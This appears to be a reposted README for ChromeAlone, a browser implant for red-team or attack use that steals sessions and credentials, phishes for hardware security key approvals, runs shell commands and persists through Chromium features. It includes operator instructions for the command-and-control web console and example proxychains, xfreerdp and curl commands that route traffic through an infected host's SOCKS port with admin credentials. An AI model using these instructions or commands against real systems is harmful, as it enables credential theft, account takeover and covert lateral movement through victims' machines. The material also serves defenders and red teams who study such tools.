ChromeAlone: Stealthy Browser Implant Steals Sessions and Phishes for YubiKeys

ChromeAlone is a browser implant that can be used in place of conventional implants like Cobalt Strike or Meterpreter. This repo provides a simple build process that will generate a management console, deploy infrastructure, and create a powershell sideloader script to run on targets.

After installation, each ChromeAlone implant will provide mechanisms for:

• Providing a SOCKS TCP Proxy on the host
• Browser session stealing and credential capture
• Launching executables on the host from Chrome
• Phishing for WebAuthn requests for physical security tokens like YubiKeys or Titan Security Keys.
• An EDR resistant form of persistence on host that is implemented entirely with Chromium’s built-in features.

Operator Instructions

Once ChromeAlone is loaded, you can view any connected hosts by opening output/client/index.html. This webapp will be pre-configured to connect back to your deployed BATTLEPLAN relay instance. Note that by default, the relay is firewalled to only allow incoming control access on ports 1080-1181 from the IP that deployed the server. If you wish to modify this, you’ll need to update the EC2 instance’s network settings to include any additional machines.

Most commands can be run from the WebUI including:

• Dumping history + cookies (via the Quick Commands section, which requires selecting a target agent in the Execute Command section)
• Capturing Credentials (these will appear via the Captured Data tab)
• Forcing WebAuthn requests (via the Execute Command section)
• File System reads (via the File Browser tab)
• Executing Shell commands (via the Interactive Shell tab)

The primary exception to this is SOCKS proxying. Each infected host is assigned a unique SOCKS port for the server that can be seen under the Agent Information section, where each agent has a Port field. The assigned port, when combined with the admin credentials stored in output/client/config.js can be used to configure a host specific SOCKS proxy.

For example, say we have an agent where the port is 1081, our domain is chrome.alone, our username admin (this is always the case), and our password is thisisnotarealpassword. Here are some example usages:

[pastacode lang=”markup” manual=”proxychains%20-q%20socks5%20admin%3Athisisnotarealpassword%40chrome.alone%3A1081%20curl%20http%3A%2F%2Fifconfig.me%0Axfreerdp%20%2Fcert%3Aignore%20%2Fv%3A%3Ctarget%20RDP%20host%3E%20%2Fu%3A%3Ctarget%20RDP%20username%3E%20%2Fproxy%3Asocks5%3A%2F%2Fadmin%3Athisisnotarealpassword%40chrome.alone%3A1081%0Acurl%20-x%20socks5h%3A%2F%2Fchrome.alone%3A1081%20-u%20%22admin%3Athisisnotarealpassword%22%20http%3A%2F%2Fifconfig.me” message=”” highlight=”” provider=”manual”/]

Install

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy